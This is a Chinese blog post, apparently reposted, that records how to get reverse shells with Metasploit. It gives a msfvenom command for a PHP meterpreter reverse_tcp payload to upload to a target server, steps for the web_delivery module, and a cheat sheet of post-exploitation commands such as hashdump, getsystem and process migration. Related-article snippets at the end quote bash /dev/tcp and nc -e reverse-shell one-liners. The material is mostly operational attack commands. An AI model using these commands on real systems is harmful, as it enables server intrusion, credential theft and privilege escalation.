今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗

反弹shell的两种方法

第一种Msfvenom实例:

1、msfconsole    #启动msf

2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php    #生成反弹shell文件

LHOST表示本地攻击机的ip, LPORT表示本地攻击机的端口。

其他msf下的各种生成payload命令可参考:https://www.cnblogs.com/backlion/p/6000544.html

这样我们就成功生成了一个shell.php文件。

3、接下来我们需要在本机中监听4444端口。

这就表示开始本机开始监听4444端口了。

4、现在把shell.php文件通过菜刀上传至目标服务器中,然后本地游览器访问shell.php

即可以看见成功返回了一个session

sessions -i     #查看当前可用会话

第二种web_delivery实例流程:

1、msfconsole    #启动msf

2、show options    #目的是看exploit target为什么脚本

这里默认为pyhton,需要更改为php

show payloads    #挑选payload,选择php/meterpreter/reverse_tcp

然后设置lhost

得到一段脚本,将这段脚本在目标机的powershell中执行即可反弹shell。

下面贴一些常用的命令:

基础命令:
seach cve-2017-7494                            #查看是否存在指定漏洞
use exploit/multi/handler                        #使用exploit/multi/handler模块
info                                                         #查看信息
show options                  #查看exp的参数  rhost 是远程主机地址  lhost是本地主机地址
back                                                       #返回上一级
session -i                                                #查看当前可用会话
sessions -i x                                           #切换至会话x
session -k                                               #杀死所有活跃会话
background                                            #将会话放到后台
route                     #查看被控主机路由表
sysinfo                       #查看系统信息
run post/windows/gather/checkvm         #检查是否在虚拟机上运行
idletime                    #查看运行时间
getuid                                              #获得运行Meterpreter会话的用户名,从而查看当前会话具有的权限
getsystem                                         #通过各种攻击向量来提升到系统用户权限
getwd pwd                                        #shell处于靶机的目录
getlwd                                               #本地的目录位置
hashdump                                         #导出目标主机中的口令哈希值
screenshot                                       #对目标主机的屏幕进行截图
backgroud                                        #将当前Meterpreter shell转为后台执行
quit                                                  #关闭当前Meterpreter会话,返回MSF终端    
ps                                                       #显示所有运行进程以及管联的用户账户
migrate PID                                      #迁移到一个指定的进程PID
post/windows/manage/migrate                                  #会自动寻找合适的进程进行迁移
execute -f cmd.exe -i                       #执行cmd.exe命令并进行交互
shell                                                    #以所有可用令牌来运行一个交互的shell

转载于:https://www.cnblogs.com/HKCZ/p/10870029.html

msf反弹shell相关推荐

  1. msf反弹shell成功,却无法建立会话处理办法

    报错:Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0 ...

  2. 内网渗透-常用反弹shell方法总结

    常用反弹shell方法总结 文章目录 常用反弹shell方法总结 前言 bash反弹shell nc反弹shell 1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 ...

  3. python反弹shell_反弹shell的各种姿势

    在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入. 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步.所有姿势 ...

  4. msf监听php反弹shell,使用msf进行反弹shell+内网渗透

    首先说明一点,反弹shell的前提是该主机可以执行咱们的恶意命令 反弹shell的原理与灰鸽子的原理是类似的,就是在靶机上执行一个咱们msf精心构造的客户端,使靶机主动回连咱们攻击机的某个端口.下面开 ...

  5. msf生成php反弹,反弹shell总结

    1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&1 2.nc反弹nc -e /bin/sh 192.168.2.130 444 ...

  6. msf反弹php shell,反弹shell总结

    1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&1 2.nc反弹nc -e /bin/sh 192.168.2.130 444 ...

  7. 一句话反弹shell

    1.bash反弹 攻击机监听端口 netcat: nc -nvlp 4444 -n:  不反向解析dns,即不通过ip解析域名 no dns -v:  详细信息输出 verbose -l:   监听 ...

  8. 【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。...

    反弹shell背景: 想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹. 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常 ...

  9. [网络安全自学篇] 五十三.Windows系统安全之Metasploit实现栈溢出攻击及反弹shell原理解析

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了虚拟机基础知识,包括XP操作系统安装.文件共享设置.网络快照及网络设置 ...

最新文章

  1. 模仿大脑:下一代计算机
  2. oracle10.2 管理工具,Oracle 10.2.0.5 EM管理器的BUG
  3. 正在学习的Angularjs包裹的插件
  4. Python自动解压各种压缩文件
  5. ASP.NET温故而知新学习系列之ASP.NET多线程编程—.NET下的多线程编程应用程序域(七)...
  6. 浦银行面试总结(信息科技部)
  7. 如何查看电脑显卡配置_组装电脑:电脑配置显卡推荐
  8. python中if有几种使用方式_python 中if-else的多种简洁的写法
  9. superset0.34源码级别汉化
  10. 是什么决定了我们以何种方式赚钱?
  11. MFC初探 —— Editcontrol实现多行显示
  12. python多窗口传递信息,认识QT ----- 多窗口以及窗口之间的传值
  13. 当年上大学时,编程老师让我们用html+CSS实现一个天猫官网
  14. 各省份的车牌简称 备案地区的简称
  15. cad卸载不干净_Mac软件卸载不干净?你可以试试AppCleaner
  16. android 邮箱注册功能,手机邮箱怎么注册登录(安卓手机邮箱设置教程)
  17. eclipse豆沙绿设置(一些其他的编辑器也变成豆沙绿)
  18. python url加密解密_python解密百度加密链接的脚本
  19. 你未来的职业规划是什么?
  20. 如何使用【亿愿专利下载器】批量下载美国专利的PDF全文

热门文章

  1. linux环境insight安装与使用
  2. 使用VC内嵌Python实现的一个代码检测工具
  3. 通过Dockerfile构建Docker镜像
  4. C++11中头文件thread的使用
  5. C++11中nullptr的使用
  6. php修改时区MST,4、修改Cacti绘图的时间精度
  7. 若依前后端分离如何写移动端接口_前后端分离实践的架构设计
  8. php裁剪图片白边,php生成缩略图填充白边(等比缩略图方案)
  9. asyncawait
  10. 远程桌面linux服务器配置,linux平台下远程桌面服务器的安装和设置